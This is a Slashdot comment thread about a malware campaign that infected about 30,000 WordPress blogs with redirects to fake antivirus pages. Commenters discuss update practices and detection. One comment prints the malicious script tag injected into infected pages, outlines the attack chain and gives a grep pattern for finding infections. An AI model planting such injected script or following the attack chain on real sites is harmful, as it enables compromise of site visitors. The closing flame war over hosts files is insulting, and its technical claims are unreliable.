×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

30K WordPress Blogs Infected With the Latest Malware Scam

Unknown Lamer posted more than 2 years ago | from the check-your-versions dept.

Security 104

alphadogg writes with an excerpt from an article over at Network World: "Almost 30,000 WordPress blogs have been infected in a new wave of attacks orchestrated by a cybercriminal gang whose primary goal is to distribute rogue antivirus software, researchers from security firm Websense say. The attacks have resulted in over 200,000 infected pages that redirect users to websites displaying fake antivirus scans. The latest compromises are part of a rogue antivirus distribution campaign that has been going on for months, the Websense researchers said."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

104 comments

McAfee? (5, Funny)

Oswald McWeany (2428506) | more than 2 years ago | (#39275373)

websites displaying fake antivirus scans

I didn't know McAfee had started targeting Web blogs now.

Re:McAfee? (3, Informative)

tepples (727027) | more than 2 years ago | (#39275389)

It might be hard to believe, but there are antivirus companies even less scrupulous than McAfee and Norton. Wikipedia explains [wikipedia.org].

Re:McAfee? (1)

Ihmhi (1206036) | more than 2 years ago | (#39277279)

Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

I dunno, sounds like Norton to me.

Norton tries to provide a working uninstaller (1)

tepples (727027) | more than 2 years ago | (#39278087)

At least Norton tries to provide a working removal tool [symantec.com] at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.

Re:McAfee? (1)

hairyfeet (841228) | more than 2 years ago | (#39278603)

Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advantage of the low rights mode for browsers built in, ABP blocks the ads that are the source of many an infection, Avast and Comodo IS have built in sandboxing which adds another layer of protection but while Avast has a simpler UI for home users Comodo IS is free for business AND home so its really a preference thing.

With this combo I took an offlease i was planning to wipe anyway and tried my damnedest to infect the thing. I went to every crapsite and topsite and "punch the monkey to win an iPod" and scammer haven i could find and afterwards ran a half a dozen offline scans, nothing. Zip zero zilch nada. Most of the nasty sites were blocked by the Comodo SecureDNS option in Dragon and when I turned that off both Avast and Comodo IS blocked the sites from loading the malware so I'd say that is a resounding success. i know i have customers (as well as family, ugh) that can pick up bugs like a Bangkok Whore on a Saturday night yet since switching them over to this combo they have been completely bug free, and with them that's saying a lot.

Re:McAfee? (0)

helix2301 (1105613) | more than 2 years ago | (#39275579)

When I had my self hosted wordpress blog there were always updates to wordpress, addon and widgets. Not to mentions spammers and scammers all day everyday, Wordpress is a great platform but very insecure.

No infection over here! (0)

Anonymous Coward | more than 2 years ago | (#39275411)

gaia ~ # find /srv/www/ -type d -name "ToolsPack"
gaia ~ #

Analysis (4, Insightful)

SirDice (1548907) | more than 2 years ago | (#39275443)

Why do they always focus on the crap that's left behind when they analyses these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was is an old and vulnerable WordPress or was it some 0-day they used? For some reason they always focus on the effects and not on the causes.

Re:Analysis (5, Informative)

WankersRevenge (452399) | more than 2 years ago | (#39275625)

From the fine article:

Many of the blogs compromised in these recent attacks were running outdated WordPress versions, had vulnerable plug-ins installed or had weak administrative passwords susceptible to brute force attacks, said David Dede, a security researcher with website integrity monitoring firm Sucuri Security. "It seems the attackers are trying everything lately."

Re:Analysis (1)

SirDice (1548907) | more than 2 years ago | (#39275859)

Ah, that helps. I only read the WebSense analysis hoping to read some details there. Apart from mentioning WordPress there isn't much in there how they actually got in.

Re:Analysis (0)

Anonymous Coward | more than 2 years ago | (#39289585)

Our pretty large wordpress-based portal was hit by this malware campaign.
In our case, the attacker gained entry through the infamous TimThumb exploit from last year.
First, the following PHP code was planted as a "command-and-control" script: http://pastie.org/private/021xesy1x83sgp0fodyq

This script was then used to infect several Wordpress include files with the following types of packed scripts: http://pastie.org/private/g9yuhafnt78jxcuf8sag
Every infection was unique, save for the array in the beginning. Some variations used base64_decode and gzinflate. The variable names were randomized, and the encoded content was unique in each case, as the script inside also had randomized variables.
The infection was on one single line, at the beginning of the infected files.

Unpacked, the script looks like this: http://pastie.org/private/otn4kadsvn0phno3igiccg
In the cases we observed, it planted rogue javascript in the HEAD section of the page that was being loaded, such as this: http://pastie.org/private/oi9vpntqiwhthj11obpyug
There were many variations of the javascript as well, but the ones I checked out just created a cookie called "lonly", and planted a rogue iframe in the body section.
The iframe then of course loaded the actual client-side exploits, among which I noticed a Java runtime vulnerability, at least.

Long story short, you can run the following on your WP directory to see if you're infected: egrep -r '^\?php.* = array\(' *

Additionally, here are some addresses used in the attack: http://pastie.org/private/u5wikv6spq8nhcaduppca

wordpress, again? (1)

v1 (525388) | more than 2 years ago | (#39275455)

Is it just a popularity/contrast thing, or does wordpress seem to be popping up a lot recently for security holes in their web servers?

Re:wordpress, again? (2)

Spad (470073) | more than 2 years ago | (#39275511)

At a guess, the ratio of Installs to Unpatched/Insecure Installs, both of the core WP software and its many, many 3rd party plugins and themes.

A *lot* of sites are either running old versions of software or have plugins/themes with gaping vulnerabilities that are no longer under active development.

Re:wordpress, again? (4, Interesting)

gmack (197796) | more than 2 years ago | (#39275647)

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

Re:wordpress, again? (1)

Anonymous Coward | more than 2 years ago | (#39275807)

Set up WP MultiSite, update one site and one set of plugins and be done with it - easy as that...

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39275849)

Stop using Windows if you want software updates that are managed.

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39276187)

That has anything to do with Wordpress?

Doesn't even make sense. Windows has automatic updating, something Linux distros are just starting to do (notifying has been around for a while, but automatically acting is "new")

Re:wordpress, again? (1)

turbidostato (878842) | more than 2 years ago | (#39276401)

"notifying has been around for a while, but automatically acting is "new""

Do you really consider something that has been available, well, forever as new? (I'll just mention cron-apt as an example).

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39276857)

It is neither installed or mentioned during a standard system installation. That's the difference.

Re:wordpress, again? (1)

turbidostato (878842) | more than 2 years ago | (#39277423)

"It is neither installed or mentioned during a standard system installation. That's the difference."

Neither is Apache therefore web servers are the new thing, is that your point?

Of course not. I know what your point is: that no *true* Scotsman...

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39277909)

What?

What does apache have to do with it? The idiot was talking about OS auto updating, which I pointed out had nothing to do with anything.

I then went on to say that even if it DID have anything to do with it, he was wrong anyway.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39276527)

Windows update doesn't provide updates for Wordpress.
The typical Linux package management does provide updates for Wordpress.
In Linux, you can customize, to your liking, the amount of automation present in your package update process.

The reason it doesn't make sense is because you are ignorant of the facts.

Re:wordpress, again? (1)

X0563511 (793323) | more than 2 years ago | (#39276905)

Er, no. Try again. Preferably with more reading comprehension.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39277567)

Windows has automatic updates for Wordpress now?
The typical Linux package manager doesn't provide updates for Wordpress?
You can't have these things automated on Linux?

What exactly are you trying to say? Because all I'm reading is "Blah blah bah I don't know what the fuck I'm talking about."

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39275861)

You should be fired for being a shitty sysadmin. It's a sysadmins job to research such problems and propose solutions, not just belly ache on forums. In this case, WPMU.

Re:wordpress, again? (1)

ArsenneLupin (766289) | more than 2 years ago | (#39276283)

Or failing to find a specific solution for Wordpress: Use perl's WWW::Mechanize to click that DB upgrade link (and any other GUI-only things) for you.

Re:wordpress, again? (4, Informative)

nick.sideras (836787) | more than 2 years ago | (#39275879)

Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

This drove me nuts at my current job for about 2 months - you need Wordpress Network [wordpress.org].

There's the easy way and the hard(er) way to do this:

This [wordpress.org] is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

This [bavatuesdays.com] is more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
Also, this [sillybean.net] is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

Once you have a network, you a fantastic "Update Network [wordpress.org]" button. Boom. Take the rest of the day off.

Re:wordpress, again? (1)

aussiedood (577993) | more than 2 years ago | (#39275897)

Agreed! At least you only have 15, I've just been given the task of managing our Wordpress implementation, we're at 144. *Ugh*

Re:wordpress, again? (1)

Anonymus (2267354) | more than 2 years ago | (#39276577)

WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion [wordpress.org] or using multisite and just updating once for every site.

Re:wordpress, again? (1)

Hatta (162192) | more than 2 years ago | (#39276587)

You can't automatically log into a website and click a link with a very small shell script?

Re:wordpress, again? (1)

element-o.p. (939033) | more than 2 years ago | (#39277399)

Seriously? It's a hassle to have to log into each server and click a link?

You must never have run Gentoo*...

*Which is still my favorite distro, despite occasionally being a real PITA to update.

Re:wordpress, again? (1)

gmack (197796) | more than 2 years ago | (#39278103)

I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

Re:wordpress, again? (1)

element-o.p. (939033) | more than 2 years ago | (#39278415)

LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*, and a few other problems are really starting to sour me on Ubuntu. I'm hoping 12.04 will bring back the stability I experienced up to 10.10; IMHO, the 11.xx series is Canonical's Vista.

*Yes, I know, those are proprietary drivers. I can't blame Canonical entirely for that, but IIRC, there are much newer drivers available that aren't available in the official "restricted" repositories.

Re:wordpress, again? (1)

gmack (197796) | more than 2 years ago | (#39278565)

I gave up on the new Ubuntu pretty quickly while installing a friend's notebook last month and ended up installing debian + xfce + wicd. No complaints from him at all.

For servers, it's hard to beat debian + dotdeb repo.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39279585)

https://wpremote.com/ allows you to update multiple wordpress sites from a single interface. I spoke with one of the developers via twitter and email and it seems secure.

Re:wordpress, again? (1)

mattrad (78969) | more than 2 years ago | (#39281511)

Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

Re:wordpress, again? (1)

Pf0tzenpfritz (1402005) | more than 2 years ago | (#39283483)

You mean "the fact that I have missed to write some working update/deployment script is annoying"? Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...

Re:wordpress, again? (1)

Anonymus (2267354) | more than 2 years ago | (#39276633)

I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin is usually written by one person who could just decide to backdoor your site in the next update.

I've got a couple of moderately popular plugins, and every time I release an update I think about just how easy it would be to take over thousands of sites by just adding a few innocuous-looking lines of code. Except I'm not evil, so I don't.

Re:wordpress, again? (0)

Anonymous Coward | more than 2 years ago | (#39277169)

So basically what it comes down to that we have to be careful what software we run? The horror!!

Method of infection (3, Insightful)

dgharmon (2564621) | more than 2 years ago | (#39275529)

"The Websense ThreatSeeker Network has detected a new wave of mass-injections [websense.com] of a well-known rogue antivirus campaign"

How exactly are these sites infected in the first place?

"The page looks like a Windows Explorer [websense.com] window with a "Windows Security Alert" dialogue box in it"

Ahh so - nothing to read here ... moving on ...

Re:Method of infection (2)

Pope (17780) | more than 2 years ago | (#39276163)

I used to get those all the time on my Mac and just laugh. Then they made a special OS X-looking one.

Re:Method of infection (1)

Rick17JJ (744063) | more than 2 years ago | (#39276839)

A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several different viruses and types of spyware had been detected in both my registry and on drive C. The funny thing is that Linux does not have a registry and also does not use drive letters to designate hard drive partitions.

It listed the names of several viruses that my Linux computer was supposedly infected with. Despite knowing that the test was bogus, I looked up those virus names out of curiosity, and found they were all Windows only viruses. Their scareware ad then offered to sell me their antivirus product, to remove the viruses and spyware.

My understanding is that most desktop users of Linux, have never felt the need to use antivirus software, because Linux viruses have never been a problem.

Despite their supposedly thorough scan of my registry and drive C, they had not noticed that I was not using Windows. Has anyone bothered yet to make a Linux version of their scareware ads?

Re:Method of infection (1)

klui (457783) | more than 2 years ago | (#39281327)

So looks like the injected code
</DIV> <!-- END body-wrapper -->
<script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
</BODY>
</HTML>

would be take care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.

Specialist ISP of Transnistria.. again. (5, Interesting)

Dynamoo (527749) | more than 2 years ago | (#39275539)

It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria [wikipedia.org]. That has featured before on Slashdot in this story [slashdot.org].

The block 194.28.112.0/22 is simply all evil (I've documented it here [dynamoo.com] in the past), there's no reason to send traffic to it at all, blocking it is a good option.

Re:Specialist ISP of Transnistria.. again. (1)

gaspyy (514539) | more than 2 years ago | (#39276151)

Transnistria is basically a haven for organized crime. A "republic" with virtually no international recognition, a very small economy and ties with international arm dealers.

Re:Specialist ISP of Transnistria.. again. (2)

Dynamoo (527749) | more than 2 years ago | (#39280425)

Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.

Thanks! apk (0)

Anonymous Coward | more than 2 years ago | (#39276211)

Looks like the exact kind of research vs. malware that I love to find online - the kind that lists the bogus IP ranges &/or bad hosts/domains involved also...

* This, in turn, leads to more valid entries for protection vs. such machinations online via addition to my custom HOSTS file with 0.0.0.0 blocking applied to each of them!

APK

P.S.=> See subject-line, & once more thanks - I truly do appreciate it! apk

/facepalm (0)

Anonymous Coward | more than 2 years ago | (#39276505)

Yes, you WOULD come along and decide to use the hosts file to block entire IP ranges. Which, of course, would require hundreds or thousands of entries, rather than a single firewall rule.

By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least). It only works for host names. I.e. "0.0.0.0 google.com" blocks http://google.com/ [google.com] (but http://74.125.225.136/ [74.125.225.136] still loads the Google website), while "0.0.0.0 74.125.225.136" simply doesn't do anything (both http://google.com/ [google.com] and http://74.125.225.136/ [74.125.225.136] load perfectly fine).

When all you have is a hammer...

LOL! I KNOW THAT - proof inside... apk (0)

Anonymous Coward | more than 2 years ago | (#39277275)

"By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least)." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

Proof vs. your misunderstanding my post is RIGHT here:

"Alexander Peter Kowalski says:
  May 1, 2011 at 1:51 AM

@JG: Thatâ(TM)s when using firewall rules tables (either software ones OR router based firewalls) to block out IP addresses." - FROM -> http://technologytosoftware.com/block-website-access-on-windows.html [technologytosoftware.com]

Eat it, boy...

* So, "as-per-my-usual"? I absolutely DUST /. 'naysayers', easily... &, with backing proof!

APK

P.S.=> Epic fail on your part troll... &, it certainly looks like you have to "eat your words", AND, take your 'facepalm' b.s. right back @ yourself, lol!

... apk

Re:LOL! I KNOW THAT - proof inside... apk (0)

Anonymous Coward | more than 2 years ago | (#39279381)

No, you specifically said that you were going to block the IP ranges with HOSTS, right here:

the kind that lists the bogus IP ranges &/or bad hosts/domains involved ... leads to more valid entries for protection vs. such machinations online via addition to my custom HOSTS file with 0.0.0.0 blocking applied to each of them

You can't. It doesn't work. Nice try, apk-boy, but you fail, and you can't spin this one off as mere trolling from an AC. You claimed that you could HOSTS-block IP addresses. You can't. You misspoke. You were wrong, and I called you on it. At this point the best thing you can do is admit it and move on.

What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39280477)

I posted far earlier SPECIFIC statements of myself noting you cannot block IP addresses using HOSTS files here:

"Alexander Peter Kowalski says:
      May 1, 2011 at 1:51 AM

@JG: That's when using firewall rules tables (either software ones OR router based firewalls) to block out IP addresses." - FROM -> http://technologytosoftware.com/block-website-access-on-windows.html [technologytosoftware.com]

Eat it, boy... There's FAR EARLIER PROOF that in regards to HOW to use hosts files, I understand them, completely.

You? LOL, you don't have the intelligence to EVER get the best of me, hence why you post as "AC", because you're weak/lame, and you KNOW it.

* Face it, troll - you lose/fail. Also note, I stated the word "valid" in my original reply?

Clue: The ONLY VALID things you can block in a hosts file, are host-domain names, & my FAR EARLIER QUOTE from above notes this... you can't win.

APK

P.S.=> Your other "blunder" here:

http://news.slashdot.org/comments.pl?sid=2712357&cid=39277339 [slashdot.org]

Utterly hilarious - trying to say diff. versions of Windows could block IP addresses using HOSTS files! LOL... apk

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39299729)

(1) You screwed up in your original post by claiming that "valid entries" in a HOSTS file could block IP addresses. I don't care if you forgot or simply misspoke. It is false. There is no "valid" way to block an IP address with HOSTS. You claimed there was. I called you on it. Admit it, Alex, and quit being an arrogant douche.

(2) You are falsely and dishonestly misrepresenting what I said. I said that Windows XP CANNOT block IP addresses using HOSTS file, which is absolutely true. I deliberately said nothing about other versions of Windows. My reason for saying was, in fact, that I am sitting in front of a Windows XP machine and tested it and it didn't work. I have not tested other versions of Windows, so I cannot comment on whether or not they can block IP addresses with HOSTS. Your "correction" was not a correction, it was additional information based on rigorous testing which (I assume) you have performed - right? You did test it on all versions of Windows? I only tested it on Windows XP.

LOL, the "big fail" by the ac stalker coward troll (0)

Anonymous Coward | more than 2 years ago | (#39300213)

Show us I was blocking ip addresses with hosts explicitly. I never said that and I produced evidence I know better (where I even corrected a fellow named JG about it) and I showed literal proof of it.

You incorrectly inferred it. Learn to read.

LOL, You on the other hand made a gigantic blunder stating different versions of Windows could do that here:

"By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least)." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

FROM -> http://news.slashdot.org/comments.pl?sid=2712357&cid=39277339 [slashdot.org]

You lose troll: There never WAS a version of Windows, or any other OS, that could block IP addresses with a hosts file.

Hell - You won't even face me under your registered account and that tells the tale perfectly showing you are indeed, weak and a trolling little coward, so calling me "arrogant douche"? Makes me laugh.

See subject-line above, lol... it's YOU!

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39300309)

I deliberately said nothing about other versions of Windows.

Oh really? It appears you did and did an EPIC FAIL here on those very grounds:

By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least).

apk also showed he doesn't block ip addressed domains in hosts files with proof from much earlier than this post exchange and that to do so would be invalid since he said valid entries here which he has been shown in knowing in his posts to JG at the site with the proof he understands how hosts files work, whereas above you do not.

Which further proves you cannot read and that you cannot win troll. You've also been shown as stalking apk all over this site. That's twisted. Grow up.

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39301003)

Good catch. Hehehe apk always nukes the cowardly ac stalker troll. Apk method = turn the tables on the cowardly ac troll stalker with his own mistakes and apk usually posts proofs to the contrary vs. the ac stalker trolls' crap. It is hilarious and happens every time, which is definitely why the cowardly ac stalker troll doesn't post with his registered account. His track record posted here this week alone is so poor he is afraid to confront apk directly. Sucks to be him. His whole life must be that way, I know the type. Cowards are all the same.

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39300473)

Since when is Windows XP a current version of Windows? Windows 7\Srv 2008 are current versions. I would like to know how you live with yourself knowing you're nothing but a cowardly stalker, or is stalking apk around this forums and constantly blundering your part as an ac stalker not illustrating this to us reading? There is 3-4 evidences of it posted here, no denying it. You're don't show us differently when you're shown in numerous attempts at trying to harass apk this week alone and failing technically too but worst of all by using ac posts instead of your registered account. You're only showing us you fear him because if you didn't you'd post under your registered account.

Re:What a truckload of b.s., lmao... apk (0)

Anonymous Coward | more than 2 years ago | (#39325813)

Since when is Windows XP a current version of Windows?

Windows XP is still a current version and it will remain a current and supported version by Microsoft, all the way until April 8 2014 (with critical bug fixes / security patches still being released until then). STRIIIIKE ONE. http://windows.microsoft.com/en-us/windows/products/lifecycle [microsoft.com]

Furthermore, many workplaces (e.g. mine) still purchase all of their computers with XP licenses. XP is very much alive and kicking, despite your (incorrect) claim that it is not a current version.

Windows 7\Srv 2008 are current versions.

Well, you have egg on your face yet again. NEITHER Windows 7, nor Windows Server 2008, are the most recent versions of those Microsoft product lines: that's Strike two, and Strike three... the way I calculate that, YER OUT.

Windows 7 was updated to Windows 7 SP1, so if you're still running Windows 7? Time to update, because your version is OLD and OBSOLETE! You have a whole slew of vulnerabilities and bugs that were patched in Windows 7 SP1.

And Windows Server 2008? It has been replaced by no less than THREE separate service packs/revisions:
Windows Server 2008 SP2
Windows Server 2008 R2
Windows Server 2008 R2 SP1 (the most recent version)

Windows Server 8 is in beta, but I won't count that one against you since it hasn't been officially released yet.
http://www.microsoft.com/en-us/server-cloud/windows-server/default.aspx [microsoft.com]

worst of all by using ac posts instead of your registered account
by Anonymous Coward on 09.03.2012 8:36 (#39300473)

Pot, meet kettle. No further comment necessary.

Posting 3 days later to get the "last word", lol? (0)

Anonymous Coward | more than 2 years ago | (#39345207)

The current models of Windows in mainstream release, are indeed, Windows 7 + Windows Server 2008 (R2 iirc on the latter but that's just a nitpick & certainly NOT XP as you stated, & now you're trying to "mince words", lol). You fail as usual:

Windows XP is NOT as current as Windows 7, or Windows Server 2008, period.

* Sorry, but I am here to "blow you away" yet again, as usual in this exchange: Per my subject-line above, did you *THINK* I was going to let a devious little wannabe 'smart' weasel like YOU, do that to ME? LOL, guess again...

APK

P.S.=> Above ALL else here, however? Your AC stalking of myself is pitiful, and shows us you do NOT have much confidence in yourself - &, the rest of my replies here do the rest, easily (plus, your taking 3 days to come up with what everyone KNOWS is a line of bullshit on your part? Not too convincing, since the CURRENT MODELS OF WINDOWS ARE NOT Windows XP, pal)... apk

Re:Posting 3 days later to get the "last word", lo (0)

Anonymous Coward | more than 2 years ago | (#39354969)

Windows Server 2008 (R2 iirc on the latter...

How many times do I have to repeat myself, you stupid troll?

Windows Server 2008 is NOT THE SAME VERSION of the Windows Server operating system as Windows Server 2008 R2. And that is not a minor nit pick. It is a COMPLETELY different release of the Windows Server operating system. If it was an update, they would have released another SERVICE PACK, like they had already released SP2 for Windows Server 2008, so if you wanted to nit pick you could say that Windows Server 2008 SP2 is a different edition of the Windows Server 2008 OS. But Windows Server 2008 R2 is a different version, as you can see here in this list, straight from Microsoft: http://support.microsoft.com/ph/1163#tab13 [microsoft.com]

Windows Server 2008 R2 (All Editions)
Windows Server 2008 (All Editions)
Windows Server 2003 R2 (All Editions)
Windows Server 2003 (All Editions except Computer Cluster Edition)
Windows Server 2003 Compute Cluster Edition

THEY ARE DIFFERENT OPERATING SYSTEMS. The list does not show any the service packs (different editions of the same OS), because they are NOT different operating systems, but it DOES list R2 separately, because IT IS A DIFFERENT OS. Windows Server 2008 is NOT the "most recent version", Windows Server 2008 R2 is.

The only reason it has the same year? Microsoft released two different versions in one year. The first one was Windows Server 2008. The next one was the 2nd released version (R2) in that year (2008): Windows Server 2008 R2.

Windows XP is NOT as current as Windows 7, or Windows Server 2008, period.

AS CURRENT? So now you admit that IT IS CURRENT (as I said it is), it is just not AS CURRENT as Windows 7. Changing the goalposts? Yes I think so. QED, bitches. Windows XP is a current Microsoft operating system and will be until its end of extended support on April 8 2014.

And Windows Server 2008 is not AS CURRENT as Windows Server 2008 R2. You fail yet again.

Re:Posting 3 days later to get the "last word", lo (0)

Anonymous Coward | more than 2 years ago | (#39359647)

You said Windows XP is a current build. It's not and that's that! U FAIL.

Re:Posting 3 days later to get the "last word", lo (0)

Anonymous Coward | more than 2 years ago | (#39365233)

You said Windows XP is a current build.

No I didn't, you fucking liar.

I never said that you could block IP addresses using hosts. YOU DID.

I never said that Windows XP is a current build. THAT IS A BLATANT LIE.

I said that Windows XP is a current version. AND IT IS.

Windows XP is in extended support by Microsoft until 2014 and there are hundreds of thousands of computers which are running fully up-to-date, patched, and CURRENT copies of the XP version of Windows.

You're a liar and a dishonest scumbag.

Take ur meds n calm down psycho: U FAILED (0)

Anonymous Coward | more than 2 years ago | (#39366423)

Proof otherwise on ip addresses in hosts files from apk was posted here http://news.slashdot.org/comments.pl?sid=2712357&cid=39277275 [slashdot.org] from long ago.

Current version(s) of Windows are not XP: Everyone knows taht. It is merely being supported still. Windows 7 & Windows Server 2008 are current models (and their updates like SRVR2).

You fail, you know it, grow up and accept it.

Re:Take ur meds n calm down psycho: U FAILED (0)

Anonymous Coward | more than 2 years ago | (#39380671)

Current version(s) of Windows are not XP

XP is currently installed on tens if not hundreds of thousands of computers and is fully up-to-date and patched with all of the latest security updates from Microsoft. Another word that means "up-to-date" is "current". XP is a current version of Windows.

Windows 7 & Windows Server 2008 are current models (and their updates like SRVR2).

R2 IS NOT AN UPDATE OF SERVER 2008. It is a NEW VERSION OF THE WINDOWS SERVER OPERATING SYSTEM. Is that fucking clear?

MS doesn't even SELL XP ANYMORE, dolt! apk (0)

Anonymous Coward | more than 2 years ago | (#39382571)

Windows XP has not been sold since June 30, 2008. On October 22, 2010, you will not be able to purchase new computers that already have Windows XP installed on them.

http://www.ehow.com/facts_6876358_buy-copy-windows-xp.html [ehow.com] [ehow.com]

It is not a current build of Windows idiot. Everyone knows that except you, but then, you DO know that too, don't you? You're just being a trolling waste of life, otherwise you wouldn't do your ac stalking posts would you. Of course not. It is fun making you look stupid though.

APK

P.S.=> I must ask - how BADLY have I 'kicked your ass' here and on what particular technical topic that you insist on attempting to stalk & harass me by your ac stalkings of myself, hmmm? LOL! You're "geek angst" is showing, and I don't think you possess the intelligence to realize 1 simple fact: You will never have the intelligence to get the better of myself, ever... apk

Does Microsoft still sell XP? U FAIL STALKER (0)

Anonymous Coward | more than 2 years ago | (#39371397)

Windows XP has not been sold since June 30, 2008. On October 22, 2010, you will not be able to purchase new computers that already have Windows XP installed on them.

http://www.ehow.com/facts_6876358_buy-copy-windows-xp.html [ehow.com]

It is not a current build of Windows idiot. Everyone knows that except you, but then, you DO know that too, don't you? You're just being a trolling waste of life, otherwise you wouldn't do your ac stalking posts would you. Of course not. It is fun making you look stupid though.

APK

P.S.=> I must ask - how BADLY have I 'kicked your ass' here and on what particular technical topic that you insist on attempting to stalk & harass me by your ac stalkings of myself, hmmm? LOL! You're "geek angst" is showing, and I don't think you possess the intelligence to realize 1 simple fact: You will never have the intelligence to get the better of myself, ever... apk

DOUBLE FAIL ON YOUR PART AGAIN, troll, lol! (0)

Anonymous Coward | more than 2 years ago | (#39277339)

"By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least)." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

CORRECTION troll: HOSTS NEVER COULD BLOCK IP ADDRESSED BASED ATTACKS ON ANY FORM OF WINDOWS (or other OS'), you utter fool...

* It's no small wonder you post as AC trying to 'goad/harass' me, but to no avail... you're my "AC stalker troll" and you've eaten your b.s. SO MANY TIMES vs. myself? It's not even funny anymore...

APK

P.S.=> Lastly, & perhaps MOST importantly? If you're going to be stupid enough to try to "take me on" & especially on hosts files?? Realize, I practically "wrote the book" on them... I love this part best though, seeing as I can "hit you over your blunt skull with it":

"When all you have is a hammer..." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

Yea, lol... letting you whack yourself over the head with it TWICE here? Priceless... lol!

...apk

incorrect: hosts can't block ip address ranges (0)

Anonymous Coward | more than 2 years ago | (#39301305)

Yes, you WOULD come along and decide to use the hosts file to block entire IP ranges. Which, of course, would require hundreds or thousands of entries, rather than a single firewall rule. by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

See subject. Can't be done\incorrect. You said it, apk didn't. Apk posted proof from long ago he knows this, despite your trolling, your own statement buries you right there.

Can a firewall do this? (0)

Anonymous Coward | more than 2 years ago | (#39301571)

